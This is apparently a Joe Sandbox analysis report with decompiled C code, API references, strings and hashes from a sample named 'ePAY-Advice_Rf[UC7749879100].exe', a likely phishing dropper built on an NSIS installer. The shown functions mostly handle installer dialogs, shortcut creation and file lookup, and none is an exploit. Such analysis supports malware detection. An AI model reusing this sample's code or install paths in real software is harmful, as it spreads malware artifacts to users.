				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41f4e0;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + "C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr\\Provokations.Fje";
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040566A(0x3fb, _t146);
					E004061D4(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040566A(0x3fb, _t146);
							if(E004059F0(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405F6A(0x41ecd8, _t146);
							_t87 = E00406302(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405F6A(0x41ecd8, _t146);
								_t89 = E0040599B(0x41ecd8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41ecd8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41ecd8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41ecd8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405949(0x41ecd8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41ecd8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E0040492F(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x422edc; // 0x7dbd8b
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404917(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41ecc8);
									} else {
										E00404852(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x4237c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E0040402B(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x41fcf8 == _t158) {
									E004043F4();
								}
								 *0x41fcf8 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x41fd08;
							_v60 = E004047EC;
							_v56 = _t146;
							_v68 = E00405F8C(_t146, 0x41fd08, _t166, 0x41f0e0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405902(_t146);
								_t125 =  *((intOrPtr*)( *0x423714 + 0x11c));
								if( *((intOrPtr*)( *0x423714 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr") {
									E00405F8C(_t146, 0x41fd08, _t166, 0, _t125);
									if(lstrcmpiA(0x4226a0, 0x41fd08) != 0) {
										lstrcatA(_t146, 0x4226a0);
									}
								}
								 *0x41fcf8 =  *0x41fcf8 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E0040596F(_t146) != 0 && E0040599B(_t146) == 0) {
						E00405902(_t146);
					}
					 *0x422ed8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404009(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404009(_t166);
					E0040403E(_t165);
					_t138 = E00406302(7);
					if(_t138 == 0) {
						L53:
						return E00404070(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x0040449b
0x004044a1
0x004044a7
0x004044b4
0x004044c2
0x004044c5
0x004044cd
0x004044d3
0x004044d3
0x004044df
0x004044e2
0x00404550
0x00404557
0x0040462e
0x00404635
0x00404644
0x00404644
0x00404648
0x00404652
0x0040465f
0x00404661
0x00404661
0x0040466f
0x00404676
0x0040467d
0x00404680
0x004046b7
0x004046b9
0x004046bf
0x004046c4
0x004046c8
0x004046ca
0x004046ca
0x004046e6
0x00000000
0x004046e8
0x004046eb
0x004046f9
0x004046ff
0x00404700
0x00404703
0x00404706
0x00000000
0x00404706
0x00404682
0x00404684
0x00404688
0x00000000
0x00000000
0x00000000
0x00000000
0x0040468a
0x0040468a
0x00404697
0x0040469c
0x00000000
0x00000000
0x004046a0
0x004046a2
0x004046a2
0x004046aa
0x004046ac
0x004046af
0x004046b2
0x004046b5
0x00000000
0x00000000
0x00000000
0x00000000
0x004046b5
0x00404712
0x0040471c
0x0040471f
0x00404722
0x00404729
0x00404729
0x0040472b
0x0040472b
0x00404730
0x00404732
0x0040473a
0x00404741
0x00404743
0x0040474e
0x0040474e
0x00404743
0x00404755
0x0040475e
0x00404768
0x00404770
0x0040478b
0x00404772
0x0040477b
0x0040477b
0x00404770
0x00404790
0x00404795
0x0040479a
0x004047a3
0x004047a3
0x004047ac
0x004047ae
0x004047ae
0x004047ba
0x004047c2
0x004047cc
0x004047cc
0x004047d1
0x00000000
0x004047d1
0x00404680
0x00404637
0x0040463e
0x00000000
0x00000000
0x00000000
0x0040463e
0x0040455d
0x00404566
0x00404580
0x00404585
0x0040458f
0x00404596
0x004045a2
0x004045a5
0x004045a8
0x004045af
0x004045b7
0x004045ba
0x004045be
0x004045c5
0x004045cd
0x00404627
0x004045cf
0x004045d0
0x004045d7
0x004045e1
0x004045e9
0x004045f6
0x0040460a
0x0040460e
0x0040460e
0x0040460a
0x00404613
0x00404620
0x00404620
0x004045cd
0x00000000
0x00404585
0x00404573
0x00000000
0x00000000
0x00404579
0x00000000
0x004044e4
0x004044f1
0x004044fa
0x00404507
0x00404507
0x0040450e
0x00404514
0x0040451d
0x00404520
0x00404523
0x0040452b
0x0040452e
0x00404531
0x00404537
0x0040453e
0x00404545
0x004047d7
0x004047e9
0x0040454b
0x0040454e
0x00000000
0x0040454e
0x00404545

APIs

GetDlgItem.USER32 ref: 004044EA
SetWindowTextA.USER32(00000000,?), ref: 00404514
SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 004045C5
CoTaskMemFree.OLE32(00000000), ref: 004045D0
lstrcmpiA.KERNEL32(Call,0041FD08,00000000,?,?), ref: 00404602
lstrcatA.KERNEL32(?,Call), ref: 0040460E
SetDlgItemTextA.USER32 ref: 00404620

Part of subcall function 0040566A: GetDlgItemTextA.USER32 ref: 0040567D

Part of subcall function 004061D4: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe",766DFA90,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040622C
Part of subcall function 004061D4: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406239
Part of subcall function 004061D4: CharNextA.USER32(?,"C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe",766DFA90,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040623E
Part of subcall function 004061D4: CharPrevA.USER32(?,?,766DFA90,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040624E

GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 004046DE
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F9

Part of subcall function 00404852: lstrlenA.KERNEL32(0041FD08,0041FD08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040476D,000000DF,00000000,00000400,?), ref: 004048F0
Part of subcall function 00404852: wsprintfA.USER32 ref: 004048F8
Part of subcall function 00404852: SetDlgItemTextA.USER32 ref: 0040490B

Strings

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr, xrefs: 004045EB
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Provokations.Fje, xrefs: 004044B4
Call, xrefs: 004045FC, 00404601, 0040460C
A, xrefs: 004045BE

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr$C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Provokations.Fje$Call
API String ID: 2624150263-3360710695
Opcode ID: 16d05e7d4c75bf53039b3acf3d6a97a1f6807c39b67a56bad8d9f5ed37ac15b8
Instruction ID: 64b5da15ede57aab044e7fe1d22d086372aa44ea1ea65b7a694081baf4ac5fa5
Opcode Fuzzy Hash: 16d05e7d4c75bf53039b3acf3d6a97a1f6807c39b67a56bad8d9f5ed37ac15b8
Instruction Fuzzy Hash: 09A1A0B1900209ABDB11AFA5CC41AEFB7B8EF85314F14843BF611B72D1D77C8A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004020D1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004020D1() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x3c) = E00402ACB(0xfffffff0);
				 *(_t111 - 0xc) = E00402ACB(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x80)) = E00402ACB(2);
				 *((intOrPtr*)(_t111 - 0x7c)) = E00402ACB(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402ACB(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x88) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x78) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E0040596F( *(_t111 - 0xc)) == 0) {
					E00402ACB(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x407408, _t87, 1, 0x4073f8, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x407418, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\alfons\\AppData\\Roaming\\fumigatorium\\Tertser\\Omstrukturdnr\\Rekapitulerer\\Inseminerede79");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x78));
						_t95 =  *((intOrPtr*)(_t111 - 0x7c));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x88));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x80)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x34)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x3c), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x004020da
0x004020e4
0x004020ee
0x004020f8
0x00402103
0x00402106
0x00402120
0x00402126
0x0040212c
0x0040212f
0x00402139
0x0040213d
0x0040213d
0x00402142
0x00402153
0x0040215b
0x00402234
0x00402234
0x0040223b
0x00402161
0x00402161
0x00402170
0x00402174
0x00402177
0x0040217d
0x0040218b
0x0040218e
0x00402190
0x0040219b
0x0040219b
0x004021a0
0x004021a2
0x004021a9
0x004021a9
0x004021ac
0x004021b5
0x004021b8
0x004021bd
0x004021bf
0x004021cc
0x004021cc
0x004021cf
0x004021d8
0x004021db
0x004021e4
0x004021ea
0x004021f1
0x0040220a
0x0040220c
0x0040221a
0x0040221a
0x0040220a
0x0040221d
0x00402223
0x00402223
0x00402226
0x0040222c
0x00402232
0x00402247
0x00000000
0x00000000
0x00000000
0x00402232
0x0040223d
0x0040295a
0x00402966

APIs

CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202

Strings

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79, xrefs: 00402193

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Rekapitulerer\Inseminerede79
API String ID: 123533781-1487347455
Opcode ID: 240bd3395635a279a5e2bd368af06017722580ed5d5ebe5c5387a58480ff266c
Instruction ID: ec73ff0caae0e60496460f1ec28f3c10d8f634d21a3ec75631efcf554c5f22e8
Opcode Fuzzy Hash: 240bd3395635a279a5e2bd368af06017722580ed5d5ebe5c5387a58480ff266c
Instruction Fuzzy Hash: CF5148B1E00208BFCB10DFE4C989A9D7BB5EF48318F2085AAF515EB2D1DA799941CF14

Uniqueness

Uniqueness Score: -1.00%

Function 004026FE Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004026FE(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402ACB(2), _t19 - 0x1c8) != 0xffffffff) {
					E00405EC8(__edi, _t6);
					_push(_t19 - 0x19c);
					_push(__esi);
					E00405F6A();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402716
0x0040272a
0x00402735
0x00402736
0x00402875
0x00402718
0x00402718
0x0040271a
0x0040271c
0x0040271c
0x0040295a
0x00402966

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823922822.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ePAY-Advice_Rf[UC7749879100].jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: df9272a3420d1704234b4569ea1b08ea77173cc6d9f3dccfb094f503d58b9c8d
Instruction ID: 595bc86bb0b87b603365eb58ea040ec14d9195657b0818bf84ef9d27f643e594
Opcode Fuzzy Hash: df9272a3420d1704234b4569ea1b08ea77173cc6d9f3dccfb094f503d58b9c8d
Instruction Fuzzy Hash: AAF0A772604151EAD700E7A499499EEB768CB15315F60457BE281F20C1C6B88A469B3E

Uniqueness

Uniqueness Score: -1.00%

Function 00404174 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404174(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x41ecd4 =  *0x41ecd4 + 1;
								__eflags =  *0x41ecd4;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404070(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x4226a0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									E00404418(_a4, _v8);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423708, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423708, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x41ecd4; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x41f4e0 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E0040402B(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E004043F4();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x422edc; // 0x7dbd8b
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x423758;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E0040413F;
					E00404009(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E00404009(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E0040402B( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E0040403E(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x423714 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x41ecd4 = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x41ecd4 = 0;
					return 0;
				}
			}

0x00404184
0x00404296
0x004042a9
0x00404305
0x00404305
0x00404309
0x004043cf
0x004043d6
0x004043d8
0x004043d8
0x004043d8
0x004043de
0x004043de
0x004043e1
0x00000000
0x004043e8
0x00404317
0x00404319
0x0040431c
0x00404323
0x00404325
0x0040432c
0x0040432e
0x00404331
0x00404334
0x00404339
0x0040433f
0x00404342
0x00404349
0x00404357
0x0040436f
0x00404371
0x00404379
0x00404388
0x0040438a
0x0040438a
0x00404349
0x0040432c
0x0040438d
0x00404394
0x00000000
0x00404396
0x00404396
0x0040439d
0x00000000
0x00000000
0x0040439f
0x004043a3
0x004043b4
0x004043b4
0x004043b6
0x004043ba
0x004043c8
0x004043c8
0x00000000
0x004043cc
0x00404394
0x004042b1
0x004042b4
0x00000000
0x00000000
0x004042bc
0x004042c2
0x00000000
0x00000000
0x004042ce
0x004042d1
0x004042d4
0x00000000
0x00000000
0x004042f7
0x004042f7
0x004042f9
0x004042fb
0x00404300
0x00000000
0x0040418a
0x0040418a
0x0040418d
0x00404192
0x00404194
0x004041a3
0x004041a3
0x004041aa
0x004041ad
0x004041af
0x004041b4
0x004041bd
0x004041c3
0x004041cf
0x004041d2
0x004041db
0x004041e0
0x004041e3
0x004041e8
0x004041ff
0x00404206
0x00404219
0x0040421c
0x00404231
0x00404238
0x0040423d
0x00404242
0x00404242
0x00404251
0x00404260
0x00404272
0x00404277
0x00404287
0x00404289
0x00000000
0x0040428f

APIs

CheckDlgButton.USER32 ref: 004041FF
GetDlgItem.USER32 ref: 00404213
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404231
GetSysColor.USER32(?), ref: 00404242
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404251
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404260
lstrlenA.KERNEL32(?), ref: 00404263
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404272
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404287
GetDlgItem.USER32 ref: 004042E9
SendMessageA.USER32(00000000), ref: 004042EC
GetDlgItem.USER32 ref: 00404317
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404357
LoadCursorA.USER32 ref: 00404366
SetCursor.USER32(00000000), ref: 0040436F
LoadCursorA.USER32 ref: 00404385
SetCursor.USER32(00000000), ref: 00404388
SendMessageA.USER32(00000111,00000001,00000000), ref: 004043B4
SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C8

Strings

?A@, xrefs: 00404373
N, xrefs: 00404305
Call, xrefs: 00404342

Memory Dump Source

Source File: 00000000.00000002.823850662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.823844110.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823867737.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.823874727.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
